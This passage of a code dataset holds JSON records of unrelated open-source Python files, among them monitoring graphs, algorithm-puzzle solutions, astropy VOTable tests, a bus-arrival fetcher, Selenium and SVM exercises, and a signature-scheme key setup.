\"--lazy\",\n \"--base\", \"1000\",\n \"--units-exponent\", \"0\", # disable automatic scaling of units\n \"--height\", height,\n \"--width\", width,\n \"--lower-limit\", \"0\",\n \"--upper-limit\", \"0.5\",\n \"--imgformat\", \"PNG\",\n \"--vertical-label\", \"processes\",\n \"--color\", \"BACK%s\" % background,\n \"--color\", \"SHADEA%s\" % border,\n \"--color\", \"SHADEB%s\" % border,\n \"DEF:avg_5min=%s:avg_5min:AVERAGE\" % self.database,\n \"AREA:avg_5min#a0df05:5 min average\",\n \"GPRINT:avg_5min:LAST:\\\\: %6.2lf proc (now)\",\n \"GPRINT:avg_5min:MAX:%6.2lf proc (max)\",\n \"GPRINT:avg_5min:AVERAGE:%6.2lf proc (avg)\")\n\n rrdtool.graph(\"%s/forks/graph-%s.png\" % (self.graphs_dir, interval), \n \"--start\", \"-%s\" % interval,\n \"--end\", \"-%d\" % refresh, # because the last data point is still *unknown*\n \"--title\", \"process spawning (forks/sec)\",\n \"--lazy\",\n \"--base\", \"1000\",\n \"--units-exponent\", \"0\", # disable automatic scaling of units\n \"--height\", height,\n \"--width\", width,\n \"--lower-limit\", \"0\",\n \"--upper-limit\", \"0.5\",\n \"--imgformat\", \"PNG\",\n \"--vertical-label\", \"forks/sec\",\n \"--color\", \"BACK%s\" % background,\n \"--color\", \"SHADEA%s\" % background,\n \"--color\", \"SHADEB%s\" % background,\n \"DEF:proc=%s:proc:AVERAGE\" % self.database,\n \"AREA:proc#a0df05:processes\",\n \"GPRINT:proc:LAST:\\\\: %6.2lf forks/sec (now)\",\n \"GPRINT:proc:MAX:%6.2lf forks/sec (max)\",\n \"GPRINT:proc:AVERAGE:%6.2lf forks/sec (avg)\")\n\n def make_html(self):\n \"\"\"Generate the HTML pages.\"\"\"\n template = OverviewPage()\n template_fill(template, self.description)\n template_write(template, self.graphs_dir + \"/index.html\")\n\n template = LoadAveragePage()\n template_fill(template, \"running processes (load average)\")\n template_write(template, self.graphs_dir + \"/load/index.html\")\n\n template = ForkRatePage()\n template_fill(template, \"process spawning rates (forks/sec)\")\n template_write(template, self.graphs_dir + \"/forks/index.html\")\n\n \n# EOF - processes.py\n","repo_name":"carlosefr/quicklook","sub_path":"components/processes.py","file_name":"processes.py","file_ext":"py","file_size_in_byte":6342,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"73727504052","text":"def bfs(x, y):\r\n # print(x, y)\r\n global min_distance\r\n global shark\r\n global can_eat\r\n d = (abs(shark_d[0] - x) + abs(shark_d[1] - y))\r\n if d > min_distance:\r\n return\r\n\r\n if maps[x][y] < shark and 0 < maps[x][y] < 7:\r\n # print('min_dis : ', min_distance)\r\n # print('can_eat : ', can_eat)\r\n # print()\r\n if not can_eat:\r\n can_eat = [x, y]\r\n min_distance = d\r\n return\r\n else:\r\n if d < min_distance:\r\n can_eat = [x, y]\r\n min_distance = d\r\n\r\n elif d == min_distance:\r\n if can_eat[0] > x or (can_eat[0] == x and can_eat[1] > y): # 더 위에 있는 물고기\r\n can_eat = [x, y]\r\n return\r\n # if d < min_distance:\r\n # can_eat = [x, y]\r\n # min_distance = d\r\n # return\r\n # elif d == min_distance:\r\n # if can_eat[0] > x or (can_eat[0] == x and can_eat[1] > y):\r\n # can_eat = [x, y]\r\n # # min_distance = min(min_distance, (abs(shark_d[0] - x) + abs(shark_d[1] - y)))\r\n # print('can_eat : ', can_eat)\r\n # return\r\n\r\n\r\n for k in range(len(dx)):\r\n if 0 <= x+dx[k] < n and 0 <= y+dy[k] < n and 0 <= maps[x+dx[k]][y+dy[k]] < 7:\r\n if maps[x+dx[k]][y+dy[k]] <= shark and visited[x+dx[k]][y+dy[k]] == False:\r\n visited[x+dx[k]][y+dy[k]] = True\r\n bfs(x+dx[k], y+dy[k])\r\n visited[x+dx[k]][y+dy[k]] = False\r\n\r\n\r\n\r\n\r\nn = int(input())\r\nmaps = []\r\nfishes = []\r\n# visited = []\r\nfor _ in range(8):\r\n temp = []\r\n fishes.append(temp)\r\n\r\ndx, dy = [-1, 0, 1, 0], [0, 1, 0, -1]\r\nshark = 2\r\nshark_d = [0, 0]\r\nmove = 0\r\nfor i in range(n):\r\n temp = list(map(int, input().split()))\r\n for j in range(len(temp)):\r\n if temp[j] == 9:\r\n shark_d = [i, j]\r\n maps.append(temp)\r\neat_fishes = 0\r\nwhile True:\r\n can_eat = []\r\n min_distance = 20*20\r\n visited = []\r\n for _ in range(n):\r\n visited.append([False] * n)\r\n\r\n visited[shark_d[0]][shark_d[1]] = True\r\n\r\n bfs(shark_d[0], shark_d[1])\r\n\r\n if not can_eat:\r\n break\r\n print(can_eat)\r\n\r\n # print('shark_d : ', shark_d)\r\n # visited[can_eat[0]][can_eat[1]] = True\r\n move += (abs(can_eat[0] - shark_d[0]) + abs(can_eat[1]-shark_d[1]))\r\n maps[shark_d[0]][shark_d[1]] = 0\r\n shark_d = [can_eat[0], can_eat[1]]\r\n eat_fishes += 1\r\n if shark == eat_fishes:\r\n # print('shark += 1!')\r\n shark += 1\r\n # print('shark : ',shark)\r\n eat_fishes = 0\r\n maps[can_eat[0]][can_eat[1]] = 0\r\n for i in range(n):\r\n print(maps[i])\r\n # print()\r\n # print('move : ',move)\r\n # print('shark_d : ',shark_d)\r\n print('shark : ',shark)\r\n print('move : ',move)\r\nprint(move)\r\n # print(can_eat)\r\n # print(min_distance)\r\n\r\n\r\n# while True:\r\n# can_eat = []\r\n# for i in range(n):\r\n# for j in range(n):\r\n# if 0 < maps[i][j] < 7 and maps[i][j] <= shark:\r\n# can_eat.append([abs(shark_d[0] - i) + abs(shark_d[1] - j), i, j])\r\n#\r\n# print(sorted(can_eat))\r\n\r\n # min_distance = 20\r\n # while q:\r\n # x, y = q[0][0], q[0][1]\r\n # for k in range(len(dx)):\r\n # if 0 <= x+dx[k] < n and 0 <= y+dy[k] < n:\r\n #\r\n\r\n # can_eat = []\r\n # for fish in fishes:\r\n # if fish:\r\n # can_eat.append([abs(fish[0], fish[1]]))\r\n\r\n\r\n\r\n# print(fishes)\r\n","repo_name":"eprj453/algorithm","sub_path":"PYTHON/BAEKJOON/16236_아기상어.py","file_name":"16236_아기상어.py","file_ext":"py","file_size_in_byte":3539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39795989512","text":"#!/usr/bin/python3.4\n# -*- coding: utf-8 -*-\n\nimport sys\nfrom read import *\nfrom graph import *\nfrom graph_window import *\nfrom browse_graph import *\n\ndef main(path, showGraph = False):\n\tresults = []\n\tstr = \"\"\n\twindow = None\n\ttry:\n\t\trules, facts, queries = read_run(path)\n\texcept Exception as e:\n\t\tprint(e)\n\t\treturn\n\tgraph = Graph(rules)\n\tif not graph.loop:\n\t\tgraph.init(facts)\n\t\tif showGraph:\n\t\t\twindow = GraphShow(graph.getGraph())\n\t\tresults = browse(graph.matrice, graph.liste, graph.invDictionnaire)\n\t\tif queries:\n\t\t\tfor i, x in enumerate(queries): \n\t\t\t\tfor y, z in enumerate(graph.invDictionnaire):\n\t\t\t\t\tif z == x:\n\t\t\t\t\t\tstr = \"result of {} is {}\".format(x, bool(results[y]))\n\t\t\t\tprint(str) if str else print(\"result of {} is {}\".format(x, False))\n\t\t\t\tstr = \"\"\n\t\tif window is not None:\n\t\t\twindow.loop()\n\telse:\n\t\tprint(\"error graph loop\")\n\nif __name__ == '__main__':\n\tif len(sys.argv) > 1:\n\t\tfor path in sys.argv[1:]:\n\t\t\tif path != \"-g\":\n\t\t\t\tmain(path, \"-g\" in sys.argv)\n\telse:\n\t\tprint(\"error arguments\")\n","repo_name":"DimitriBischoff/xpertSys","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70593917492","text":"import os\nimport sys\n\nin_fn = sys.argv[1]\nout_fn = sys.argv[2]\n\nfin = open(in_fn, 'r')\nfout = open(out_fn, 'w')\n\nres = dict()\ndef add(d):\n global res\n l = d.split('/')\n cur_res = res\n for i in l:\n if i not in cur_res.keys():\n cur_res[i] = dict()\n cur_res = cur_res[i]\n\ndata_list = []\nfor item in fin.readlines():\n data = item.rstrip().split()[-1]\n data_list.append(data)\n add(data)\n\ncur_id = 0\ndef traverse(n, d, cur_name):\n global cur_id\n cur_id += 1\n\n if cur_name == None:\n cur_cur_name = n\n else:\n cur_cur_name = cur_name + '/' + n\n\n assert cur_cur_name in data_list, cur_cur_name\n\n if len(d.keys()) == 0:\n fout.write('%d %s leaf\\n' % (cur_id, cur_cur_name))\n else:\n fout.write('%d %s subcomponents\\n' % (cur_id, cur_cur_name))\n for item in d.keys():\n traverse(item, d[item], cur_cur_name)\n\nassert len(res.keys()) == 1\nroot = res.keys()[0]\ntraverse(root, res[root], None)\n","repo_name":"daerduoCarey/partnet_seg_exps","sub_path":"stats/merging_hierarchy_mapping/process_merging_tmp2.py","file_name":"process_merging_tmp2.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"21"} +{"seq_id":"5323451129","text":"animals = ['tiger', 'elephant', 'snake', 'shark']\n\n\n'''\nPython runs code from top line to bottom line.\nIn the same line, python runs from left to right.\nHere python notices, it needs to append something at the end of the animals list.\nThen python tries figuring out what it should append, it notices it is another function call.\nSo append function pauses first.\nPython will first call animals.pop(0), 'tiger' is popped out, returned as the value to be appended.\nThen append function resumes.\n'''\nanimals.append(animals.pop(0))\n\n'''\nit equals to:\npopped_animal = animals.pop(0)\nanimals.append(popped_animal)\n'''\n\nprint(animals) # ['elephant', 'snake', 'shark', 'tiger']","repo_name":"Coding-PIGGY/PythonClass03","sub_path":"program2/python_0063_nested_method_call.py","file_name":"python_0063_nested_method_call.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15196628151","text":"#!/usr/bin/env python\nfrom urllib import urlopen\nimport json\n\ndef getnextbuses(stop):\n\n f = urlopen('http://countdown.tfl.gov.uk/stopBoard/%s' % stop)\n d = json.load(f)\n\n next = {}\n\n for bus in d['arrivals']:\n if bus['routeId'] not in next and not bus['isCancelled']:\n next[bus['routeId']] = bus\n return next\n\nwest = getnextbuses('76309')\neast = getnextbuses('48630')\n\ndef wait_key(bus):\n wait, _, unit = bus['estimatedWait'].partition(' ')\n if wait == 'due':\n wait = 0\n elif unit == 'min':\n wait = int(wait)\n return wait, bus['routeId']\n\nwest = sorted(west.values(), key=wait_key)\neast = sorted(east.values(), key=wait_key)\n\nwestmsg = ', '.join('%s in %s' % (b['routeId'], b['estimatedWait'].replace(' ', '')) for b in west)\neastmsg = ', '.join('%s in %s' % (b['routeId'], b['estimatedWait'].replace(' ', '')) for b in east)\n\nprint ('Going west: %s; Going east: %s' % (westmsg, eastmsg))\n","repo_name":"londonhackspace/irccat-commands","sub_path":"nextbus.py","file_name":"nextbus.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"21"} +{"seq_id":"18588688481","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\nimport io\n\n# THIRD-PARTY\nimport numpy as np\nimport pytest\nfrom numpy.testing import assert_array_equal\n\n# LOCAL\nfrom astropy.io.votable import converters, exceptions, tree\nfrom astropy.io.votable.table import parse_single_table\nfrom astropy.utils.data import get_pkg_data_filename\n\n\ndef test_invalid_arraysize():\n with pytest.raises(exceptions.E13):\n field = tree.Field(None, name=\"broken\", datatype=\"char\", arraysize=\"foo\")\n converters.get_converter(field)\n\n\ndef test_oversize_char():\n config = {\"verify\": \"exception\"}\n with pytest.warns(exceptions.W47) as w:\n field = tree.Field(None, name=\"c\", datatype=\"char\", config=config)\n c = converters.get_converter(field, config=config)\n assert len(w) == 1\n\n with pytest.warns(exceptions.W46) as w:\n c.parse(\"XXX\")\n assert len(w) == 1\n\n\ndef test_char_mask():\n config = {\"verify\": \"exception\"}\n field = tree.Field(None, name=\"c\", arraysize=\"1\", datatype=\"char\", config=config)\n c = converters.get_converter(field, config=config)\n assert c.output(\"Foo\", True) == \"\"\n\n\ndef test_oversize_unicode():\n config = {\"verify\": \"exception\"}\n with pytest.warns(exceptions.W46) as w:\n field = tree.Field(\n None, name=\"c2\", datatype=\"unicodeChar\", arraysize=\"1\", config=config\n )\n c = converters.get_converter(field, config=config)\n c.parse(\"XXX\")\n assert len(w) == 1\n\n\ndef test_unicode_mask():\n config = {\"verify\": \"exception\"}\n field = tree.Field(\n None, name=\"c\", arraysize=\"1\", datatype=\"unicodeChar\", config=config\n )\n c = converters.get_converter(field, config=config)\n assert c.output(\"Foo\", True) == \"\"\n\n\ndef test_unicode_as_char():\n config = {\"verify\": \"exception\"}\n field = tree.Field(\n None, name=\"unicode_in_char\", datatype=\"char\", arraysize=\"*\", config=config\n )\n c = converters.get_converter(field, config=config)\n\n # Test parsing.\n c.parse(\"XYZ\") # ASCII succeeds\n with pytest.warns(\n exceptions.W55,\n match=(\n r'FIELD \\(unicode_in_char\\) has datatype=\"char\" but contains non-ASCII'\n r\" value\"\n ),\n ):\n c.parse(\"zła\") # non-ASCII\n\n # Test output.\n c.output(\"XYZ\", False) # ASCII str succeeds\n c.output(b\"XYZ\", False) # ASCII bytes succeeds\n value = \"zła\"\n value_bytes = value.encode(\"utf-8\")\n with pytest.warns(exceptions.E24, match=r\"E24: Attempt to write non-ASCII value\"):\n c.output(value, False) # non-ASCII str raises\n with pytest.warns(exceptions.E24, match=r\"E24: Attempt to write non-ASCII value\"):\n c.output(value_bytes, False) # non-ASCII bytes raises\n\n\ndef test_unicode_as_char_binary():\n config = {\"verify\": \"exception\"}\n\n field = tree.Field(\n None, name=\"unicode_in_char\", datatype=\"char\", arraysize=\"*\", config=config\n )\n c = converters.get_converter(field, config=config)\n c._binoutput_var(\"abc\", False) # ASCII succeeds\n with pytest.raises(exceptions.E24, match=r\"E24: Attempt to write non-ASCII value\"):\n c._binoutput_var(\"zła\", False)\n\n field = tree.Field(\n None, name=\"unicode_in_char\", datatype=\"char\", arraysize=\"3\", config=config\n )\n c = converters.get_converter(field, config=config)\n c._binoutput_fixed(\"xyz\", False)\n with pytest.raises(exceptions.E24, match=r\"E24: Attempt to write non-ASCII value\"):\n c._binoutput_fixed(\"zła\", False)\n\n\ndef test_wrong_number_of_elements():\n config = {\"verify\": \"exception\"}\n field = tree.Field(None, name=\"c\", datatype=\"int\", arraysize=\"2x3*\", config=config)\n c = converters.get_converter(field, config=config)\n with pytest.raises(exceptions.E02):\n c.parse(\"2 3 4 5 6\")\n\n\ndef test_float_mask():\n config = {\"verify\": \"exception\"}\n field = tree.Field(None, name=\"c\", datatype=\"float\", config=config)\n c = converters.get_converter(field, config=config)\n assert c.parse(\"\") == (c.null, True)\n with pytest.raises(ValueError):\n c.parse(\"null\")\n\n\ndef test_float_mask_permissive():\n config = {\"verify\": \"ignore\"}\n field = tree.Field(None, name=\"c\", datatype=\"float\", config=config)\n\n # config needs to be also passed into parse() to work.\n # https://github.com/astropy/astropy/issues/8775\n c = converters.get_converter(field, config=config)\n assert c.parse(\"null\", config=config) == (c.null, True)\n\n\ndef test_double_array():\n config = {\"verify\": \"exception\", \"version_1_3_or_later\": True}\n field = tree.Field(None, name=\"c\", datatype=\"double\", arraysize=\"3\", config=config)\n data = (1.0, 2.0, 3.0)\n c = converters.get_converter(field, config=config)\n assert c.output(1.0, False) == \"1\"\n assert c.output(1.0, [False, False]) == \"1\"\n assert c.output(data, False) == \"1 2 3\"\n assert c.output(data, [False, False, False]) == \"1 2 3\"\n assert c.output(data, [False, False, True]) == \"1 2 NaN\"\n assert c.output(data, [False, False]) == \"1 2\"\n\n a = c.parse(\"1 2 3\", config=config)\n assert_array_equal(a[0], data)\n assert_array_equal(a[1], False)\n\n with pytest.raises(exceptions.E02):\n c.parse(\"1\", config=config)\n\n with pytest.raises(AttributeError), pytest.warns(exceptions.E02):\n c.parse(\"1\")\n\n with pytest.raises(exceptions.E02):\n c.parse(\"2 3 4 5 6\", config=config)\n\n with pytest.warns(exceptions.E02):\n a = c.parse(\"2 3 4 5 6\")\n\n assert_array_equal(a[0], [2, 3, 4])\n assert_array_equal(a[1], False)\n\n\ndef test_complex_array_vararray():\n config = {\"verify\": \"exception\"}\n field = tree.Field(\n None, name=\"c\", datatype=\"floatComplex\", arraysize=\"2x3*\", config=config\n )\n c = converters.get_converter(field, config=config)\n with pytest.raises(exceptions.E02):\n c.parse(\"2 3 4 5 6\")\n\n\ndef test_complex_array_vararray2():\n config = {\"verify\": \"exception\"}\n field = tree.Field(\n None, name=\"c\", datatype=\"floatComplex\", arraysize=\"2x3*\", config=config\n )\n c = converters.get_converter(field, config=config)\n x = c.parse(\"\")\n assert len(x[0]) == 0\n\n\ndef test_complex_array_vararray3():\n config = {\"verify\": \"exception\"}\n field = tree.Field(\n None, name=\"c\", datatype=\"doubleComplex\", arraysize=\"2x3*\", config=config\n )\n c = converters.get_converter(field, config=config)\n x = c.parse(\"1 2 3 4 5 6 7 8 9 10 11 12\")\n assert len(x) == 2\n assert np.all(x[0][0][0] == complex(1, 2))\n\n\ndef test_complex_vararray():\n config = {\"verify\": \"exception\"}\n field = tree.Field(\n None, name=\"c\", datatype=\"doubleComplex\", arraysize=\"*\", config=config\n )\n c = converters.get_converter(field, config=config)\n x = c.parse(\"1 2 3 4\")\n assert len(x) == 2\n assert x[0][0] == complex(1, 2)\n\n\ndef test_complex():\n config = {\"verify\": \"exception\"}\n field = tree.Field(None, name=\"c\", datatype=\"doubleComplex\", config=config)\n c = converters.get_converter(field, config=config)\n with pytest.raises(exceptions.E03):\n c.parse(\"1 2 3\")\n\n\ndef test_bit():\n config = {\"verify\": \"exception\"}\n field = tree.Field(None, name=\"c\", datatype=\"bit\", config=config)\n c = converters.get_converter(field, config=config)\n with pytest.raises(exceptions.E04):\n c.parse(\"T\")\n\n\ndef test_bit_mask():\n config = {\"verify\": \"exception\"}\n with pytest.warns(exceptions.W39) as w:\n field = tree.Field(None, name=\"c\", datatype=\"bit\", config=config)\n c = converters.get_converter(field, config=config)\n c.output(True, True)\n assert len(w) == 1\n\n\ndef test_boolean():\n config = {\"verify\": \"exception\"}\n field = tree.Field(None, name=\"c\", datatype=\"boolean\", config=config)\n c = converters.get_converter(field, config=config)\n with pytest.raises(exceptions.E05):\n c.parse(\"YES\")\n\n\ndef test_boolean_array():\n config = {\"verify\": \"exception\"}\n field = tree.Field(None, name=\"c\", datatype=\"boolean\", arraysize=\"*\", config=config)\n c = converters.get_converter(field, config=config)\n r, mask = c.parse(\"TRUE FALSE T F 0 1\")\n assert_array_equal(r, [True, False, True, False, False, True])\n\n\ndef test_invalid_type():\n config = {\"verify\": \"exception\"}\n with pytest.raises(exceptions.E06):\n field = tree.Field(None, name=\"c\", datatype=\"foobar\", config=config)\n converters.get_converter(field, config=config)\n\n\ndef test_precision():\n config = {\"verify\": \"exception\"}\n\n field = tree.Field(None, name=\"c\", datatype=\"float\", precision=\"E4\", config=config)\n c = converters.get_converter(field, config=config)\n assert c.output(266.248, False) == \"266.2\"\n\n field = tree.Field(None, name=\"c\", datatype=\"float\", precision=\"F4\", config=config)\n c = converters.get_converter(field, config=config)\n assert c.output(266.248, False) == \"266.2480\"\n\n\ndef test_integer_overflow():\n config = {\"verify\": \"exception\"}\n\n field = tree.Field(None, name=\"c\", datatype=\"int\", config=config)\n c = converters.get_converter(field, config=config)\n with pytest.raises(exceptions.W51):\n c.parse(\"-2208988800\", config=config)\n\n\ndef test_float_default_precision():\n config = {\"verify\": \"exception\"}\n\n field = tree.Field(None, name=\"c\", datatype=\"float\", arraysize=\"4\", config=config)\n c = converters.get_converter(field, config=config)\n assert (\n c.output([1, 2, 3, 8.9990234375], [False, False, False, False])\n == \"1 2 3 8.9990234375\"\n )\n\n\ndef test_vararray():\n votable = tree.VOTableFile()\n resource = tree.Resource()\n votable.resources.append(resource)\n table = tree.TableElement(votable)\n resource.tables.append(table)\n\n tabarr = []\n heads = [\"headA\", \"headB\", \"headC\"]\n types = [\"char\", \"double\", \"int\"]\n\n vals = [[\"A\", 1.0, 2], [\"B\", 2.0, 3], [\"C\", 3.0, 4]]\n for i in range(len(heads)):\n tabarr.append(\n tree.Field(votable, name=heads[i], datatype=types[i], arraysize=\"*\")\n )\n\n table.fields.extend(tabarr)\n table.create_arrays(len(vals))\n for i in range(len(vals)):\n values = tuple(vals[i])\n table.array[i] = values\n buff = io.BytesIO()\n votable.to_xml(buff)\n\n\ndef test_gemini_v1_2():\n \"\"\"\n see Pull Request 4782 or Issue 4781 for details.\n \"\"\"\n table = parse_single_table(get_pkg_data_filename(\"data/gemini.xml\"))\n assert table is not None\n\n tt = table.to_table()\n assert (\n tt[\"access_url\"][0]\n == \"http://www.cadc-ccda.hia-iha.nrc-cnrc.gc.ca/data/pub/GEMINI/\"\n \"S20120515S0064?runid=bx9b1o8cvk1qesrt\"\n )\n","repo_name":"astropy/astropy","sub_path":"astropy/io/votable/tests/test_converter.py","file_name":"test_converter.py","file_ext":"py","file_size_in_byte":10561,"program_lang":"python","lang":"en","doc_type":"code","stars":4015,"dataset":"github-code","pt":"21"} +{"seq_id":"70470502454","text":"from dataclasses import dataclass\nfrom enum import Enum\nfrom typing import Optional, Dict, List\n\nimport yaml\nfrom pydantic import BaseModel\n\n\nclass RewardActionType(str, Enum):\n KEYPRESS = 'keypress'\n\n\n@dataclass\nclass RewardAction:\n type: RewardActionType\n value: str\n\n @staticmethod\n def from_dict(as_dict: dict) -> 'RewardAction':\n return RewardAction(\n type=RewardActionType(as_dict.get('type')),\n value=as_dict.get('value')\n )\n\n # Should be called \"__dict__\" but that confused the PyCharm debugger and\n # makes it impossible to inspect any instance variables\n # https://youtrack.jetbrains.com/issue/PY-43955\n def to_dict(self) -> dict:\n return {\n 'type': self.type.value,\n 'value': self.value\n }\n\n\n@dataclass\nclass RewardConfig:\n id: Optional[str]\n title: str\n cost: int\n actions: Dict[str, RewardAction]\n\n @staticmethod\n def from_dict(as_dict: dict) -> 'RewardConfig':\n return RewardConfig(\n id=as_dict.get('id'),\n title=as_dict.get('title'),\n cost=as_dict.get('cost'),\n actions={\n key: RewardAction.from_dict(action_dict)\n for (key, action_dict) in as_dict.get('actions', dict()).items()\n }\n )\n\n def to_dict(self) -> dict:\n return {\n 'id': self.id,\n 'title': self.title,\n 'cost': self.cost,\n 'actions': {\n key: action.to_dict() for (key, action) in self.actions.items()\n }\n }\n\n\n@dataclass\nclass ClientConfig:\n log_level: str\n auto_fulfill: bool\n refund: bool\n rewards: List[RewardConfig]\n\n @staticmethod\n def from_dict(as_dict: dict) -> 'ClientConfig':\n return ClientConfig(\n log_level=as_dict.get('logLevel', 'info').upper(),\n auto_fulfill=as_dict.get('autoFulfill', False),\n refund=as_dict.get('refund', False),\n rewards=[\n RewardConfig.from_dict(r) for r in as_dict.get('rewards', list())\n ]\n )\n\n def to_dict(self) -> dict:\n return {\n 'logLevel': self.log_level.lower(),\n 'autoFulfill': self.auto_fulfill,\n 'refund': self.refund,\n 'rewards': [\n reward.to_dict() for reward in self.rewards\n ]\n }\n\n\nclass TokenFromUrlDTO(BaseModel):\n url: str\n\n\nclass YamlDumper(yaml.Dumper):\n \"\"\"\n From: https://stackoverflow.com/a/39681672\n \"\"\"\n def increase_indent(self, flow=False, indentless=False):\n return super(YamlDumper, self).increase_indent(flow, False)\n","repo_name":"cetteup/0xQWERTY-client","sub_path":"src/classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"4806586632","text":"# Author:zqbin\n# @Time:2023/10/8 16:15\n# @Author:14988\n# @Site:\n# @File:demo11.py\n# @Software:PyCharm\nimport time\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.action_chains import ActionChains\n\n\ndriver = webdriver.Chrome()\ndriver.implicitly_wait(20)\ndriver.get('https://www.baidu.com')\ndriver.maximize_window()\n\naction = ActionChains(driver)\nelement = driver.find_element(By.CSS_SELECTOR, \".title-content-title\")\n\nprint('textElement.text=', element.text)\ndriver.find_element(By.CSS_SELECTOR, '#kw').send_keys('美食')\ntime.sleep(2)\ndriver.find_element(By.CSS_SELECTOR, '#kw').clear()\n\nsearchButton = driver.find_element(value=\"su\")\nprint(searchButton.size)\nprint(searchButton.location)\nprint(searchButton.rect)\n\ninput()\n\ntime.sleep(5)\ndriver.close()\ndriver.quit()\n","repo_name":"FoXM999/ceniu","sub_path":"p96/ui_day01/demo11.py","file_name":"demo11.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"780885962","text":"import Solve\n#import random\nclass PublicKey:\n p = 1\n alpha = 1\n beta = 1\nclass PrivateKey:\n a = 1\nclass Doc:\n x = 1\npublicKey = PublicKey()\nprivateKey = PrivateKey()\ndoc = Doc()\ndef init():\n print(\"------Value initialization------\")\n p = int(input(\"enter the prime number p:\"))\n while (not (Solve.isPrime(p))) and (not (Solve.isPrime((p-1)/2))) :\n p = int(input(\"re-enter the prime number p:\"))\n publicKey.p = p\n\n g = Solve.primRoots(p)[0]\n publicKey.alpha = g*g\n a = int(input(\"enter the number a with 1 <= a <= (p-1)/2: \"))\n privateKey.a = a\n publicKey.beta = Solve.powerMode(publicKey.alpha, privateKey.a, publicKey.p)\n\n print(\"public key: K(p, alpha, beta) : K(\" + str(publicKey.p) + \", \" + str(publicKey.alpha) + \", \" + str(publicKey.beta) + \")\")\n print(\"secret key aK(a) : K(\" + str(privateKey.a) + \")\")\n x = int(input(\"enter text x:\"))\n doc.x = x\n","repo_name":"KiritiVelivela/undeniable_signature","sub_path":"init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28394155511","text":"import csv\nimport json\nfrom shapely.geometry.polygon import Polygon as ShapelyPolygon\nfrom shapely.geometry import shape\n\n\ndef get_addresses():\n file_path = './BOSTON_MASTER.csv'\n with open(file_path) as csvfile:\n addresses = []\n readCSV = csv.reader(csvfile, delimiter=',')\n for index, row in enumerate(readCSV):\n if index > 0:\n address = row[0]\n addresses.append(address)\n return addresses\n\nclass Polygon:\n def __init__(self, sub_district, unique_code, coordinates, polygon_type):\n self.sub_district = sub_district\n self.unique_code = unique_code\n self.coordinates = coordinates\n self.type = polygon_type\n\n def to_shapely_polygon(self) -> ShapelyPolygon:\n return shape({\n 'type': self.type,\n 'coordinates': self.coordinates\n })\n \n def _adjust_coordinate(coordinate):\n return tuple(coordinate)\n\n\ndef get_polygons() -> list[Polygon]:\n with open('./BOSTON_SUBDISTRICTS.geojson') as geojson:\n data = json.load(geojson)\n polygons = []\n for feature in data[\"features\"]:\n polygons.append(Polygon(\n feature['properties']['Zone_Desc'],\n feature['properties']['Unique_Code'],\n feature['geometry']['coordinates'],\n feature['geometry']['type']\n ))\n return polygons\n \n\n \n","repo_name":"IkeyBenz/frastai","sub_path":"get_addresses.py","file_name":"get_addresses.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16026471724","text":"# 연속합 2, G5, DP\n\nfrom sys import stdin\n\nn = int(stdin.readline())\narr = list(map(int, stdin.readline().split()))\n\ndp = [[0] * n for _ in range(2)] #dp[0][i] = 제거X 수열, dp[1][i] = 제거O 수열\ndp[0][0] = arr[0]\ndp[1][0] = -1000\n\nfor i in range(1, n):\n dp[0][i] = max(dp[0][i-1] + arr[i], arr[i]) # 이전꺼를 더한값 or 새로 가는거(음수일때)\n dp[1][i] = max(dp[0][i-1], dp[1][i-1] + arr[i]) # 지금꺼를 버리기 or 계속 더해나가기\n\ntmp1, tmp2 = max(dp[0]), max(dp[1])\nprint(max(tmp1, tmp2))\n\n\n","repo_name":"lookinmin/CodingTest","sub_path":"DP/BOJ_13398.py","file_name":"BOJ_13398.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23196803737","text":"#!/usr/bin/python\n\n\"\"\" \n This is the code to accompany the Lesson 2 (SVM) mini-project.\n\n Use a SVM to identify emails from the Enron corpus by their authors: \n Sara has label 0\n Chris has label 1\n\"\"\"\n \nimport sys\nfrom time import time\nsys.path.append(\"../tools/\")\nfrom email_preprocess import preprocess\n\n\n### features_train and features_test are the features for the training\n### and testing datasets, respectively\n### labels_train and labels_test are the corresponding item labels\nfeatures_train, features_test, labels_train, labels_test = preprocess()\n\n\n##linear\n#########################################################\nfrom sklearn import svm\nfrom sklearn.metrics import accuracy_score\n\nclflin = svm.SVC(kernel='linear')\n\n#features_train = features_train[:len(features_train)/100] \n#labels_train = labels_train[:len(labels_train)/100] \n\nt0 = time()\nclflin.fit(features_train, labels_train)\nprint (\"training time with SVM's linear kernel\", time()-t0)\n\nt1 = time()\npredlin = clflin.predict(features_test)\nprint (\"prediction time with SVM's linear kernel\", time()-t1)\n\nprint(accuracy_score(labels_test, predlin))\n\n##rbf - radial basis function\n#########################################################\nclfrbf = svm.SVC(kernel='rbf', C=10000)\n\nt0 = time()\nclfrbf.fit(features_train, labels_train)\nprint (\"training time with SVM's rbf kernel\", time()-t0)\n\nt1 = time()\npredrbf = clfrbf.predict(features_test)\nprint (\"prediction time with SVM's rbf kernel\", 